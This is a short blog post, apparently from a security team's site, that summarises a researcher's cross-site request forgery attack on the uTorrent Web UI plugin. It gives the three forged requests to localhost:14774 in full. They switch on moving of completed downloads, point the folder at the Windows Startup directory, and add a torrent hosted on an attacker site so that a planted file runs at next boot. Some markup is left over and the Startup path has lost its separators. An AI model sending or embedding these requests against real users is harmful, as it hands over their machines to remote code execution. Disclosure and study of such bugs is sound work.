Own a box via CSRF

Rob Carter has posted a blog on how to pwn a box via a pure CSRF bug of a uTorrent plugin. When a user installs the uTorrent Web UI plugin, the plugin starts a locally running web server on your machine. Basically, his CSRF exploit force uTorrent to move completed downloads to an arbitrary directory on their system, download arbitrary torrents, and completely own their box. </p>

The first CSRF to turn on the “Move completed downloads” option on the uTorrent Web UI. http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1
The second CSRF to change the path of where the completed torrent download is placed. For example:</p> http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:

Documents%20and%20SettingsAll%20UsersStart%20MenuProgramsStartup </li> </ul>
- The last CSRF is to force the victim to download a torrent which points to an attacker controlled file. Once the file is downloaded via torrent, uTorrent places the files into startup folder and automatically run the file in the next windows boot.</p> http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent

Hướng dẫn sử dụng Tor để vào Facebook trên Android (Categories: tutorials)
Gentoo: How to install Zine+lighttpd in 5 minutes (Categories: tutorials)
Just an MD5 collision pair (Categories: tutorials)
Python Shellcode Encoder (Categories: tutorials)
Clickjacking revealed (Categories: tutorials)
xvnkb cvs patch (Categories: tutorials)

« Tội phạm đánh cắp tiền từ ngân hàng Việt Nam Secret History of TEMPEST »

ORC Team

Own a box via CSRF

Related Posts